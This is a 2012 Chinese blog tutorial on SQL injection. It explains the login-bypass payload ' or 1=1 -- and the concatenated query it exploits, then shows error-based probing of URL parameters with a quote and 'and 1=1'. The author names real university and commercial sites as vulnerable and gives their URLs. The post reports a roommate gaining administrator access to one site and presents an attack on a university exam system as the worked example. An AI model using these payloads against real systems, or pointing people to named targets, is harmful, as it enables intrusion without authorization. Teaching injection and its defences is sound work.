SQL注入——网络安全问题不容忽视!(一)

于 2012-05-14 17:06:00 发布
阅读量174 收藏 1
点赞数
文章标签: 网络 java 数据库

http://1035054540-qq-com.iteye.com/blog/1517577


前言——

学习数据库,老师说需要有人自学研究sql注入,然后做一个充满漏洞的系统,做测试。很荣幸,这个人是我。然后大概经过一个礼拜的自学,从攻击和防御两个阶段对安全问题进行了算是彻底的研究。并且发现在网上发现了一系列充满漏洞的网站,漏洞大同小异,但是这对于我们来说,安全问题尤为重要。

分析方式我们先讲一种注入方式,再讲原理

1.最简单的测试方式绕过登陆验证

Java代码 复制代码 收藏代码
  1. Stringname="wsx'or1=1--"
  3. Stringpwd="随便写点什么" 
String name=" wsx ' or 1=1 --"

String pwd="随便写点什么"

如图所示。

这样就可以绕进去。

这儿有个有漏洞的网站 :中南大学水电管理系统 http://sdzx.csu.edu.cn/ 有时不能访问一般可以访问。

原理:此种情况后台的通用代码是这样写的。

Java代码 复制代码 收藏代码
  1. Stringsql="select*fromadminwherename='"+name+"'"+"andpwd='"+pwd+"'";
String sql = "select * from admin where name='" + name + "'" +" and pwd='" + pwd + "'";
Java代码 复制代码 收藏代码

name 和pwd 是我们前台传进来的两个字符串 利用sql语句本身的一些问题,得以绕过。

“ --” 这在sql里面代表注释,所以,在sql语句在执行的过程中 “--”后面的语句时不执行的。

此时,前台我们传进来 name ="wsx ' or 1=1 --" name=“随便写点什么”

则在后台构成的要执行的sql语句是下面这样的

Java代码 复制代码 收藏代码
  1. select*fromadminwherename=‘wsx'or1=1--’andpwd=‘随便写点什么';
 
select * from admin where name=‘ wsx ' or 1=1 -- ’   and   pwd=‘ 随便写点什么';

而“--”后面的语句是不执行的那么则变成了下面这种情况

Java代码 复制代码 收藏代码
  1. select*fromadminwherename=‘wsx'or1=1
select * from admin where name=‘ wsx ' or 1=1

此时,只要满足where 后面的条件,语句就正确执行 ,显然 name=‘ wsx ' or 1=1 是恒成立的,那么就返回为正确的。所以顺利登陆。

接下来继续发表,说说如何获取管理员用户名和密码以及如何防御的文章!敬请期待!



写上一篇文章是好几天前的事情了。中间去百度笔试去鸟。现在接着更新。

今天室友发现了一个可以 用 ' or 1=1 --攻入进去的网站 http://www.iliyu.com/ 并且一进去直接就是管理员的身份。可以进行编辑和删除等一些操作。

当然,用上述的操作时一些很菜鸟的。一般注重安全意识的系统这个问题已经解决了。不会让你这样简单的攻入进去。所以我们还得另想办法,打入内部。获取系统的数据库相关表的信息。这样我们才能得到更多的信息。

我们就对这个党中南大学党校考试系统来进行攻击

http://71party.csu.edu.cn/party_test/show_news_info.asp?id=41

我们先进行判断,这个系统是不是有错误。判断方法很简单,在41后面加上'单引号

http://71party.csu.edu.cn/party_test/show_news_info.asp?id=41 '

如果此时页面和刚才的一样那么说明这个系统是安全的。当然,也许只是对 单引号这些关键词过滤了。而没有对其他关键词过滤,这个我们后面讨论。

如果页面出错。也就是此时的页面和不加单引号的页面不一样。那么我们就考虑它是有问题的,为了进一步进行验证。我们再在url后面加上and 1=1

http://71party.csu.edu.cn/party_test/show_news_info.asp?id=41and 1=1

如果此时。页面和不加and 1=1的页面是相同的话,那么说明这个系统是有问题的。

原理:

我们探究一下为什么上述的操作能够证明系统是好的还是坏的。如果系统有问题那么后台的代码就是下面的情况!

首先,没有对获取的值进行判断,是字符串还是整形数据。

Java代码 复制代码 收藏代码
  1. Stringid=request.getparameter("id");
  3. select*fromtablewhereid=id;
String  id=request.getparameter("id");

select  * from   table  where id = id;

后台是上述代码的话,假如我们在url中输入的是

http://71party.csu.edu.cn/party_test/show_news_info.asp?id=41 '

那么在后台就运行的sql语句就是下面的形式;

Java代码 复制代码 收藏代码
  1. select*fromtablewhereid=41'
select * from table where  id=41'

而在数据库中保存的记录是id=41.这样找不到id=41 ' 的。所以就会出错。和正确输入id=41是不一样的页面。

如果输入的是

http://71party.csu.edu.cn/party_test/show_news_info.asp?id=41 and 1=1

那么后台执行的sql语句就是如下

Java代码 复制代码 收藏代码
  1. select*fromtablewhereid=41and1=1
select * from table where id=41 and 1=1

sql语句当where 条件成立的时候才会执行。1=1 成立,如果存在id=41.那么where语句显然是成立的。

加上and 1=1是为了测试是不是后台加了过滤函数之类的。比如过滤and 关键字。



程江玉
关注
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值